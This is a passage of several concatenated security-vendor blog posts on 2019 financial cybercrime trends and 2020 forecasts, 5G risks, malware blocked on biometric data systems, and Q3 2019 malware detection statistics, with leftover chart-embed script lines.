Secondly, there were several high-profile leaks of biometric databases. The most notorious was the leak of the Biostar 2 database that included the biometric data of over 1 million people. The company stored unencrypted data, including names, passwords, home addresses, email addresses and, most importantly, unencrypted biometric data that included fingerprints and facial recognition patterns as well as the actual photos of faces. A similar leak occurred at a US Customs and Border Patrol contractor, where biometric information of over 100,000 people was leaked.

There have already been several proof-of-concept attacks that use biometric data to bypass security controls, but those attacks could still be countered with system updates. With these latest leaks, on the other hand, this won’t work because your biometric data cannot be changed – it stays with you forever.

The cases mentioned above, combined with the high-quality research carried out by cybercriminals to obtain a complete digital fingerprint of a user in order to bypass anti-fraud systems, suggest that relying solely on biometric data will not solve the current problems. Today’s implementations need a lot of effort and more research to make them truly secure.

Targeted attack groups specializing in financial institutions: splitting and globalization FIN7

In 2018, Europol and the US Department of Justice announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. Some believed that the arrest would have an impact on the group’s operations, but this does not seem to have been the case. In fact, the number of groups operating under the umbrella of CobaltGoblin and FIN7 has grown: there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first operating under this umbrella is the now-notorious FIN7 that specializes in attacking various companies to get access to financial data or their PoS infrastructure. It relies on the Griffon JScript backdoor and Cobalt/Meterpreter and, in more recent attacks, PowerShell Empire.

The second is CobaltGoblin/Carbanak/EmpireMonkey. It uses the same toolkit, techniques and a similar infrastructure, but targets only financial institutions and associated software and service providers.

The final group is the newly discovered CopyPaste group, which has targeted financial entities and companies in one African country – leading us to believe that this group is associated with cyber-mercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It’s possible that the operators of this cluster of activity were influenced by open-source publications and don’t actually have any ties to FIN7.

All of these groups benefit greatly from unpatched systems in corporate environments and continue to use effective spear-phishing campaigns in conjunction with well-known Microsoft Office exploits generated by their exploitation framework. So far, the groups have not used any zero-day exploits. FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they have proved to be quite successful.

In the middle of 2019, FIN7 fell silent, but returned at the end of the year with new attacks and new tools. We suspect that the silent period is connected to their infrastructure shutdown that occurred after closing a bulletproof hosting company in Eastern Europe.

In contrast to FIN7, the activity of the Cobalt Goblin Group was stable throughout the year, which once again proves that these groups are connected, but operate on their own: their toolsets and TTPs are very similar, but operate independently; and only occasionally can we spot overlaps in infrastructure. At the same time, the intensity of attacks is slightly lower than in 2018. Cobalt Goblin’s tactics have remained the same: they use documents with exploits that first load a small downloader and then a Cobalt beacon. The main targets also remain the same: small banks in a variety of countries. Perhaps we have detected a lower number of attacks due to diversification, because some indicators suggest the group could also be engaging in JS sniffing (MageCarting) in order to obtain data about payment cards directly from websites.

JS sniffing was extremely popular throughout the year and we found thousands of e-commerce websites infected with these scripts. The injected scripts act in different ways and the infrastructure of the attackers is very different, which suggests that this type of fraud is used by at least a dozen cybercrime groups.

The Silence group actively expanded its operations into different countries throughout the year. We detected attacks in regions where we have never seen them before. For example, we recorded attacks in Southeast Asia and Latin America. This indicates that they have either expanded their operations themselves or started cooperating with other regionally installed cybercrime groups. However, when we look at the development of their main backdoor, we see that their technologies have barely changed over the last two years.

ATM malware becomes more targeted

When it came to ATM malware, we discovered a number of completely new families in 2019. The most notable were ATMJadi and ATMDtrack.

ATMJadi is an interesting one because it doesn’t use the standard XFS, JXFS or CSC libraries. Instead, it uses the victim bank’s ATM software Java proprietary classes: meaning the malware will only work on a small subset of ATMs. It makes this malware very targeted (towards one specific bank).

This is reminiscent of the FASTcach case from 2018, when criminals targeted servers running AIX OS. With a decrease in the number of general-purpose cashout tools, we can say that ATM malware is becoming rarer and more targeted.

Another interesting piece of malware is ATMDtrack, which was first detected in financial institutions in India and is programmed to cash out ATMs. Using the Kaspersky Targeted Attack Attribution Engine (KTAE), we were able to attribute these attacks to the Lazarus group, which supports our prediction from 2018 that there will be “more nation-state sponsored attacks against financial organizations“. Moreover, similar spyware has been found in research centers, with Lazarus APT group using almost identical tools to steal research results from scientific institutes.

Card info theft and reuse

During the year we saw a lot of malware targeting end users and businesses looking for credit card data. In Brazil, in particular, we saw a couple of malware families fighting it out between themselves to maintain control of infected devices. HydraPOS and ShieldPOS were very active during the year, with new versions that included a lot of new targets; Prilex, meanwhile, reduced its activities in the second half of the year.

ShieldPOS has been active since at least 2017 and, after being malware only, it has finally evolved into a MaaS (malware-as-a-service). This fact shows there’s great interest from Latin American cybercriminals in running their own “business” to steal credit cards. HydraPOS has been mostly focused on stealing money from POS systems in restaurants, parking slot machines and different retail stores.

Compared to ShieldPOS, HydraPOS is an older campaign from an actor we named Maggler, which has been in the credit card business since at least 2016. The main difference is that, unlike ShieldPOS, it doesn’t work as MaaS. In both cases, we suspect that the initial infection vector is a carefully prepared social engineering campaign involving telephone calls to the victims.

Analysis of forecasts for 2019

Before giving our forecasts for 2020, let’s see how accurate our forecasts for 2019 turned out to be:

The emergence of new groups due to the fragmentation of Cobalt/Carbanak and FIN7: new groups and new geography.

  • Yes, we saw CobaltGoblin activity, FIN7 activity, CopyPaste activity and the intersection of IoCs and the Silence group.

The first attacks through the theft and use of biometric data.

  • Yes, hacking of various biometric data databases regularly appeared throughout the year. We also revealed a digital fingerprint market where criminals can buy digital fingerprints, which includes, among other things, behavioral data (component of biometrics).

The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, Southeast Asia and Central Europe.

  • No. It turned out that well-known groups such as Lazarus, Silence and CobaltGoblin took their place and very actively attacked financial institutions in these regions.

Continuation of supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world.

  • Yes.

Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of POS attacks with attacks on systems accepting online payments (Magecarting/JS skimming).

  • Yes, the number of groups that started carrying out attacks on online payment systems grew constantly over the year. We detected thousands of websites that were affected by JS skimming.

The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network.

  • Yes, and not only in financial institutions but even the aerospace industry, namely NASA, has suffered from this type of attack.

Attacks on mobile banking for business users.

  • No.

Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wire transfers.

  • Yes, BEC (business email compromise) attacks have been on the rise worldwide. We have seen major attacks in Japan, while there have also been campaigns in South America, particularly in Ecuador.
  • Additionally, advanced social attacks have been actively used in Brazil to make POS operators go to a malicious website to download specially crafted remote control modules and run them, for example, in HydraPOS attacks.
Forecast 2020 Attacks against Libra and TON/Gram

The successful launch of cryptocurrencies such as Libra and Gram might lead to the worldwide spread of this type of asset, which naturally will attract the attention of criminals. Given the serious surge in cybercriminal activity during the rapid growth of Bitcoin and altcoins in 2018, we predict that a similar situation will most likely unfold around Gram and Libra. Large players in this market should be especially careful, as there are a number of APT groups, such as WildNeutron and Lazarus, whose interests include crypto assets. They are very likely to exploit these developments.

Reselling bank access

During 2019, we witnessed cases where groups who specialize in targeted attacks on financial institutions appeared in the victims’ networks after intrusions by other groups that specialize in selling rdp/vnc access, such as FXMSP and TA505. These facts are also confirmed by underground forums and chat monitoring.

In 2020, we expect an increase in the activity of groups specializing in the sale of network access in the African and Asian regions, as well as in Eastern Europe. Their prime targets are small banks, as well as financial organizations recently bought by big players who are rebuilding their cybersecurity system in accordance with the standards of their parent companies.

Ransomware attacks against banks

This forecast logically follows from the previous one. As mentioned above, small financial institutions often become the victims of opportunistic cybercriminals. If these criminals cannot resell access, or even if it becomes less likely that they will be able to withdraw money, then the most logical monetization of such access is ransomware. Banks are among those organizations that are more likely to pay a ransom than accept the loss of data, so we expect the number of such targeted ransomware attacks to continue to rise in 2020.

Another ransomware attack vector against small and medium financial institutions will be a “pay-per-install” scheme. Traditional botnets will eventually turn into increasingly popular delivery mechanisms against those financial institutions.

2020: the return of custom tooling

Measures taken by antivirus products to effectively detect open source tools used for pen testing purposes, and the adoption of the latest cyberdefense technologies, will push cybercrime actors to return to custom tooling in 2020 and also invest in new Trojans and exploits.

Global expansion of mobile banking Trojans: result of leaked source

Our research and monitoring of underground forums suggests that the source code of some popular mobile banking Trojans was leaked into the public domain. Given the popularity of such Trojans, we expect a repeat of the situation when the source code of ZeuS and SpyEye Trojans were leaked: the number of attempts to attack users will increase at times, and the geography of attacks will expand to almost every country in the world.

Investment apps on the rise: new target for criminals

Mobile investment apps are becoming more popular among users around the globe. This trend won’t go unnoticed by cybercriminals in 2020. Given the popularity of some fintech companies and exchanges (for both real and virtual money), cybercriminals will realize that not all of them are prepared to deal with massive cyberattacks, as some apps still lack basic protection for customer accounts, and do not offer two-factor authentication or certificate pinning to protect app communication. Several governments are deregulating this area and new players are appearing every day, becoming popular very quickly. In fact, we have already seen attempts by cybercriminals to substitute the interfaces of these apps with their own malicious versions.

Magecarting 3.0: even more attacker groups and cloud apps to become prime targets

Over the past couple of years, JS skimming has gained immense popularity among attackers. Unfortunately, cybercriminals now have a huge attack surface that consists of vulnerable e-commerce websites and extremely cheap JS skimmer tools available for sale on various forums, starting at $200. At the moment we are able to distinguish at least 10 different actors involved in these types of attacks and we believe that their number will continue to grow during the next year. The most dangerous attacks will be on companies that provide services such as e-commerce as a service, which will lead to the compromise of thousands of companies.

Political instability leading to the spread of cybercrime in specific regions

Some countries are experiencing political and social upheaval, resulting in masses of people seeking refugee status in other countries. These waves of immigration include all sorts of people, including cybercriminals. This phenomenon will result in the spread of geographically localized attacks in countries that have not previously been affected by them.

5G technology predictions 2020

3 Prosinec, 2019 - 11:00

It is estimated that data will reach 175 zettabytes worldwide by 2025, up from 1.2 zettabytes in 2010, when 4G was first being deployed globally. 5G is known as the fifth generation cellular network technology. It is expected to be as much as 100 times faster than the present 4G systems, with up to 25 times lower latency or lag time, and as many as one million devices supported within one square kilometer. The foundation of 5G can be summarized in five technologies: millimeter waves, small cell networks, massive MIMO (multiple input multiple output), beamforming, and bytes full duplex.

With the dramatic increase in the amount and transfer speed of connected devices comes a natural expansion and amplification of the threats. The evolution, development and connectivity of numerous systems within 5G opens the door to numerous threats, which can be summarized as follows.

Vulnerabilities of telco services and infrastructure

As 5G innovations spread, more shortcomings and imperfections will show up in 5G gear, customer frameworks and administration by authorities. This could enable an attacker to damage or bring down a telco infrastructure, spy on its clients or divert its traffic. Governments need to set up nationwide capabilities to utilize objective and specialized confirmation techniques to evaluate both 5G adopters and suppliers, to discover faults and stipulate fixes.

User safety and privacy concerns

On the privacy side, matters become more complex. The advent of 5G with its short range will definitely mean more cell communication towers being deployed into commercial centers and buildings. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to large amounts of data being sent by user devices, which could show exactly what is happening inside a user’s home and at the very least describe via metadata their living environment, in-house sensors and parameters. Such data could expose a user’s privacy or could be manipulated and misused. Service providers may also consider selling such data to other service companies such as advertisers in an attempt to open up new revenue streams. In some cases, vulnerabilities could cause injuries or ill health, for instance, if a client’s therapeutic gadgets are disconnected and not operational. The potential threats will be even greater when critical infrastructure components such as water and energy equipment are put at risk.

Critical infrastructure expansion and risks

5G will assist in spreading communication to a larger number of geographical areas than at present. It will also equip non-networkable gadgets with remote monitoring and control. However, increasing numbers of connected systems like this will no longer be non-critical infrastructure, expanding our exposure to risk. People are being enticed to adopt convenience and non-stop communications, but the related threats could pose public safety risks.

Action plan

5G is going to have a revolutionary impact on telecommunications because, in addition to the technology itself, it is going to become a basis for other technologies and inventions, giving way to technological advances, particularly in the fields of smart cities, intelligent power grids and defense facilities. It is the next generation of cellular network using the existing 4G LTE in addition to opening up millimeter wave band. 5G will be able to welcome more network-connected devices and considerably increase speeds for all users.

However, as with every major technology, especially while it is evolving, 5G is likely to draw the attention of threat actors looking for opportunities to attack it. We may, for instance, see large-scale DDoS attacks, or challenges in terms of protecting a sophisticated network of connected devices whereby the compromise of one device can lead to a whole network crashing. In addition, 5G is developing technology on top of the previous infrastructure, which means it will inherit the vulnerabilities and misconfigurations of its predecessor.

Furthermore, the communication trust model will not be identical to previous cellular generations. IoT and M2M devices are expected to occupy a greater portion of the network capacity. The interaction of all these devices in the 5G network will likely trigger unprecedented issues in product design and device behavior. Given these fears and the political challenges, encouraging a zero-trust network model and strict product quality compliance would help build trust between the technology adopters and providers.

Government and industry leaders should join forces to promote secure and safe 5G technology projects to enhance the services and quality of life for citizens of smart cities. Furthermore, the communication trust model will be different from previous cellular generations.

IoT and M2M devices are expected to occupy the 5G network bandwidth, and the interlinkage of all these devices in the 5G network will reveal previously unknown problems in the design and behavior of 5G. With regards to such worries and the additional political disputes, adopting a zero-trust network model and strict quality assessment along with compliance would help shape the relationship between the technology adopters and providers.

Hi-tech vendor and governmental structures should join forces to prevent the exploitation of 5G by threat actors and preserve its innovative features for technical progress and improving the quality of living conditions.

Biometric data processing and storage system threats

2 Prosinec, 2019 - 16:00

Initially, digital biometric data processing systems were used primarily by government agencies and special services (police, customs, etc.). However, the rapid evolution of information technology has made biometric systems accessible for ‘civil’ use. They are increasingly becoming part of our everyday lives, augmenting and replacing traditional authentication methods, such as those based on logins and passwords. Indeed, identifying people using characteristics that are unique to each person, such as fingerprints, voices, facial shapes or their distinctive eye structure, seems an obvious and incredibly convenient method.

Today, biometric authentication is used to access government and commercial offices, industrial automation systems, corporate and personal laptops and mobile phones. Both the number and the variety of applications for these technologies continues to grow.

Unfortunately, like many other technologies that have been rapidly evolving lately, biometric authentication systems have proved to have significant drawbacks. The key shortcomings of biometric authentication technologies have to do with information security issues.

In this report, we will discuss the numerous information security issues affecting biometric authentication systems and present the results of our own research, to provide additional information for a more objective evaluation of risks associated with using existing biometric authentication system implementations.

Biometric data processing and storage

The concept of biometric data as a unique personal identifier that cannot be forged is fundamentally wrong and can foster a false sense of security.

Firstly, the accuracy of biometric data recognition by authentication systems, although relatively high, can still be insufficient for many applications. After all, such recognition is not about simply calculating whether two hash sums are equal or not, as in the case of password-based authentication. Biometric systems usually have a greater-than-zero probability of false-negative and false-positive results.

Secondly, research demonstrates that many human biometric characteristics can be forged (falsified) by malicious actors, and copying digitized biometric data may be even easier than copying physical biometrics.

Thirdly (and most importantly), biometric data, once compromised, is compromised for good: users cannot change their stolen fingerprints the way they do stolen passwords. What’s more, biometric data may turn out to be compromised for all applications at the same time. An individual will therefore potentially be affected for the rest of his or her life.

Given all of the issues above, it is remarkable how careless biometric authentication system developers and users are about protecting these systems and the biometric data collected by them against computer attacks.

It turns out that biometric data may be stored in a format that is easily accessible to attackers. A striking example is the notorious story of a major breach found in BioStar 2, a web-based biometric security smart lock platform. According to researchers, the service had a publicly accessible database – over 27.8 million records, a total of 23 gigabytes of data on employees within 5,700 organizations, from 83 countries. The database contained, among other confidential data, about one million fingerprint records, as well as facial recognition information. According to the report, “…instead of saving a hash of the fingerprint (that can’t be reverse-engineered) they are saving people’s actual fingerprints that can be copied for malicious purposes.”

Unfortunately, the problem pointed out by researchers in connection with the BioStar 2 story is by no means far-fetched. There are known cases of biometric data being targeted by attackers. For example, information stolen in a 2015 cyberattack included nearly six million fingerprints of people associated with the US government.

As the number of potential applications for biometric authentication systems grows, it could easily be envisaged that biometric data will be of interest not only to special services (which the Office of Personnel Management believes is most likely to have been behind their 2015 attack), but other categories of attackers, as well.

Threats blocked on biometric data processing and storage systems

With the risks described above in mind, we decided to evaluate to what extent biometric data processing systems (servers that process and store data, as well as workstations used to collect biometric data) are open to malware attacks, so we analyzed the threats blocked by Kaspersky products on such systems.

Research focus

Computers (servers and workstations) used to collect, process and store biometric data (such as fingerprints, hand geometry, face, voice and iris templates) on which Kaspersky products are installed.

Reporting period

Q3 2019.

One third of systems under threat

According to Kaspersky Security Network (KSN) data, in Q3 2019 malware was blocked on 37% of computers that perform the functions of collecting, processing and storing biometric data – in other words, one computer in three was at risk of malware infection.

It can be seen in the quarterly data below that although the percentage of computers on which malware was blocked has decreased by 6.6 percentage points since the beginning of 2019, it remains at a sufficiently high level.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Percentage of biometric processing system computers on which malware was blocked, Q1 – Q3 2019 (download)

Threat sources

An analysis of threat sources has shown that, as with many other systems that require heightened security measures (such as industrial automation systems, building management systems, etc.), the internet is the main source of threats for biometric data processing systems.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Main sources of threats for biometric data processing and storage systems, Q3 2019 (download)

Internet-borne threats were blocked on 14.4% of all biometric data processing systems. This category includes threats blocked on malicious and phishing websites, as well as web-based email services.

Removable media (8%) and network folders (6.1%) are most often used to distribute worms. After infecting a computer, worms commonly download spyware and remote access Trojans, as well as ransomware.

As for threats blocked in email clients, in most cases these were typical phishing emails (fake messages on the delivery of goods and services, the payment of invoices, RFQ, RFP, etc.) containing links to malicious websites or attached office documents with embedded malicious code.

Most dangerous

Among the threats blocked on biometric data processing and storage systems, we highlighted spyware, malware used in phishing attacks (mostly spyware downloaders and droppers), ransomware, and banking Trojans as posing the greatest danger to such systems.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Some of the malware types blocked on biometric data processing and storage systems (download)

Overall, in Q3 2019 spyware was blocked on 5.4% of computers used to collect, process and store biometric data. Malware used in phishing attacks and ransomware was blocked on 5.1% and 1.9% of such computers, respectively.

It should be noted that other types of malware also included malicious programs designed to steal banking data (1.5%). It is not likely that these malicious programs were intended for stealing biometric data. However, it can be expected that mass-distributed malware designed to steal biometric data from banks and financial systems will appear in the near future.


As discussed above, in Q3 2019 37% of computers used to collect, process and store biometric data were at risk of malware infection. Among other malicious objects, Kaspersky products blocked modern remote-access Trojans (5.4% of all computers analyzed), malware used in phishing attacks (5.1%), ransomware (1.9%), and Trojan bankers (1.5%).

Although malware blocked on the computers analyzed is not specific to biometric data processing systems, the danger posed by it should not be underestimated.

Such malware is capable of:

  • stealing confidential information;
  • loading and executing arbitrary software;
  • enabling attackers to control infected computers remotely.

Although such threats are not specifically designed to steal biometric data or tamper with it, some of them have the technical capability to do that. In addition, the side effects of an active infection could significantly affect the availability of authentication systems and the integrity of biometric data.

This is why we believe that exposing biometric systems to random cyberthreats is a huge risk for both the service provider and the people who have entrusted their biometric data to it.

It should also be noted that, as we determined in the course of our research, biometric data processing and storage systems (and specifically biometric databases) are often deployed on application servers shared with other systems, rather than dedicated computers. In other words, if attackers compromise, say, a mail server or a database used by the website of an organization that has a biometric authentication system, the chances are that they will also find the biometric database on the same server.

Given all of the above, we believe that the existing situation with the security of biometric data is critical and needs to be brought to the attention of industry and government regulators and the community of information security experts, as well as the general public. After all, anyone can be at risk in this case, regardless of their occupation, professional background and skills.

IT threat evolution Q3 2019. Statistics

29 Listopad, 2019 - 11:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network:

  • Kaspersky solutions blocked 989,432,403 attacks launched from online resources in 203 countries across the globe.
  • 560,025,316 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were blocked on the computers of 197,559 users.
  • Ransomware attacks were defeated on the computers of 229,643 unique users.
  • Our File Anti-Virus detected 230,051,054 unique malicious and potentially unwanted objects.
  • Kaspersky products for mobile devices detected:
    • 870,617 malicious installation packages
    • 13,129 installation packages for mobile banking Trojans
    • 13,179 installation packages for mobile ransomware Trojans
Mobile threats Quarterly highlights

In Q3 2019, we discovered an extremely unpleasant incident with the popular CamScanner app on Google Play. The new version of the app contained an ad library inside with the Trojan dropper Necro built in. Judging by the reviews on Google Play, the dropper’s task was to activate paid subscriptions, although it could deliver another payload if required.

Another interesting Trojan detected in Q3 2019 is Trojan.AndroidOS.Agent.vn. Its main function is to “like” Facebook posts when instructed by its handlers. Interestingly, to make the click, the Trojan attacks the Facebook mobile app on the infected device, literally forcing it to execute its command.

In the same quarter, we discovered new FinSpy spyware Trojans for iOS and Android. In the fresh versions, the focus is on snooping on correspondence in messaging apps. The iOS version requires a jailbreak to do its job, while the Android version is able to spy on the encrypted Threema app among others.

Mobile threat statistics

In Q3 2019, Kaspersky detected 870,617 malicious installation packages.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of detected malicious installation packages, Q4 2018 – Q3 2019 (download)

Whereas in previous quarters we observed a noticeable drop in the number of new installation packages, Q3’s figure was up by 117,067 packages compared to the previous quarter.

Distribution of detected mobile apps by type

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of detected mobile apps by type, Q2 and Q3 2019 (download)

Among all the mobile threats detected in Q3 2019, the lion’s share went to potentially unsolicited RiskTool-class programs (32.1%), which experienced a fall of 9 p.p. against the previous quarter. The most frequently detected objects were in the RiskTool.AndroidOS families: Agent (33.07% of all detected threats in this class), RiskTool.AndroidOS.Wapron (16.43%), and RiskTool.AndroidOS.Smssend (10.51%).

Second place went to miscellaneous Trojans united under the Trojan class (21.68%), their share increased by 10 p.p. The distribution within the class was unchanged since the previous quarter, with the Trojan.AndroidOS.Hiddapp (32.5%), Trojan.AndroidOS.Agent (12.8%), and Trojan.AndroidOS.Piom (9.1% ) families remaining in the lead. Kaspersky’s machine-learning systems made a significant contribution to detecting threats: Trojans detected by this technology (the Trojan.AndroidOS.Boogr verdict) made up 28.7% — second place after Hiddapp.

In third place were Adware-class programs (19.89%), whose share rose by 1 p.p. in the reporting period. Most often, adware programs belonged to one of the following families: AdWare.AndroidOS.Ewind (20.73% of all threats in this class), AdWare.AndroidOS.Agent (20.36%), and AdWare.AndroidOS.MobiDash (14.27%).

Threats in the Trojan-Dropper class (10.44%) remained at the same level with insignificant (0.5 p.p.) growth. The vast majority of detected droppers belonged to the Trojan-Dropper.AndroidOS.Wapnor family (69.7%). A long way behind in second and third place, respectively, were Trojan-Dropper.AndroidOS.Wroba (14.58%) and Trojan-Dropper.AndroidOS.Agent (8.75%).

TOP 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs classified as RiskTool or adware.

Verdict %* 1 DangerousObject.Multi.Generic 48.71 2 Trojan.AndroidOS.Boogr.gsh 9.03 3 Trojan.AndroidOS.Hiddapp.ch 7.24 4 Trojan.AndroidOS.Hiddapp.cr 7.23 5 Trojan-Dropper.AndroidOS.Necro.n 6.87 6 DangerousObject.AndroidOS.GenericML 4.34 7 Trojan-Downloader.AndroidOS.Helper.a 1.99 8 Trojan-Banker.AndroidOS.Svpeng.ak 1.75 9 Trojan-Dropper.AndroidOS.Agent.ok 1.65 10 Trojan-Dropper.AndroidOS.Hqwar.gen 1.52 11 Trojan-Dropper.AndroidOS.Hqwar.bb 1.46 12 Trojan-Downloader.AndroidOS.Necro.b 1.45 13 Trojan-Dropper.AndroidOS.Lezok.p 1.44 14 Trojan.AndroidOS.Hiddapp.cf 1.41 15 Trojan.AndroidOS.Dvmap.a 1.27 16 Trojan.AndroidOS.Agent.rt 1.24 17 Trojan-Banker.AndroidOS.Asacub.snt 1.21 18 Trojan-Dropper.AndroidOS.Necro.q 1.19 19 Trojan-Dropper.AndroidOS.Necro.l 1.12 20 Trojan-SMS.AndroidOS.Prizmes.a 1.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked.

First place in our TOP 20 as ever went to DangerousObject.Multi.Generic (48.71%), the verdict we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

Second and six places were claimed by Trojan.AndroidOS.Boogr.gsh (9.03%) and DangerousObject.AndroidOS.GenericML (4.34%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

Third, fourth, and fourteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to covertly foist ads onto victims.

Fifth, twelfth, eighteenth, and nineteenth positions went to Trojan droppers of the Necro family. Although this family showed up on the radar last quarter, really serious activity was observed only in this reporting period.

Seventh place goes to Trojan-Downloader.AndroidOS.Helper.a (1.99%), which is what members of the Necro family usually extract from themselves. Helper.a is tasked with downloading arbitrary code from malicious servers and running it.

The eighth place was taken by the malware Trojan-Banker.AndroidOS.Svpeng.ak (1.75%), the main task of which is to steal online banking credentials and intercept two-factor authorization codes.

Ninth position went to Trojan-Dropper.AndroidOS.Agent.ok (1.65%), which is distributed under the guise of FlashPlayer or a Rapidshare client. Most commonly, it drops adware modules into the infected system.

Tenth and eleventh places went to members of the Trojan-Banker.AndroidOS.Hqwar family. The popularity of this dropper among cybercriminals continues to fall.

Geography of mobile threats

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile malware infection attempts, Q3 2019 (download)

TOP 10 countries by share of users attacked by mobile malware

Country* %** 1 Iran 52.68 2 Bangladesh 30.94 3 India 28.75 4 Pakistan 28.13 5 Algeria 26.47 6 Indonesia 23.38 7 Nigeria 22.46 8 Tanzania 21.96 9 Saudi Arabia 20.05 10 Egypt 19.44

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country.

In Q3’s TOP 10, Iran (52.68%) retained top spot by share of attacked users. Note that over the reporting period the country’s share almost doubled. Kaspersky users in Iran most often encountered the adware app AdWare.AndroidOS.Agent.fa (22.03% of the total number of mobile threats), adware installing Trojan.AndroidOS.Hiddapp.bn (14.68% ) and the potentially unwanted program RiskTool.AndroidOS.Dnotua.yfe (8.84%).

Bangladesh (30.94%) retained second place in the ranking. Users in this country most frequently encountered adware programs, including AdWare.AndroidOS.Agent.fс (27.58% of the total number of mobile threats) and AdWare.AndroidOS.HiddenAd.et (12.65%), as well as Trojan.AndroidOS.Hiddapp.cr (20.05%), which downloads adware programs.

India (28.75%) climbed to third place due to the same threats that were more active than others in Bangladesh: AdWare.AndroidOS.Agent.fс (36.19%), AdWare.AndroidOS.HiddenAd.et (17.17%) and Trojan.AndroidOS.Hiddapp.cr (22.05%).

Mobile banking Trojans

In the reporting period, we detected 13,129 installation packages for mobile banking Trojans, only 770 fewer than in Q2 2019.

The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Svpeng (40.59% of all detected banking Trojans), Trojan-Banker.AndroidOS. Agent (11.84%), and Trojan-Banker.AndroidOS.Faketoken (11.79%) families.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 – Q3 2019 (download)

TOP 10 mobile banking Trojans

Verdict %* 1 Trojan-Banker.AndroidOS.Svpeng.ak 16.85 2 Trojan-Banker.AndroidOS.Asacub.snt 11.61 3 Trojan-Banker.AndroidOS.Svpeng.q 8.97 4 Trojan-Banker.AndroidOS.Asacub.ce 8.07 5 Trojan-Banker.AndroidOS.Agent.ep 5.51 6 Trojan-Banker.AndroidOS.Asacub.a 5.27 7 Trojan-Banker.AndroidOS.Faketoken.q 5.26 8 Trojan-Banker.AndroidOS.Agent.eq 3.62 9 Trojan-Banker.AndroidOS.Faketoken.snt 2.91 10 Trojan-Banker.AndroidOS.Asacub.ar 2.81

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by banking threats.

The TOP 10 banking threats in Q3 2019 was headed by Trojans of the Trojan-Banker.AndroidOS.Svpeng family: Svpeng.ak (16.85%) took first place, and Svpeng.q (8.97%) third. This is not the first time we have detected amusing obfuscation in Trojans from Russian-speaking cybercriminals — this time the code of the malware Svpeng.ak featured the names of video games.

Snippets of decompiled code from Trojan-Banker.AndroidOS.Svpeng.ak

Second, fourth, sixth, and tenth positions in Q3 went to the Asacub Trojan family. Despite a decrease in activity, Asacub samples are still found on devices around the world.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile banking threats, Q3 2019 (download)

TOP 10 countries by share of users attacked by mobile banking Trojans:

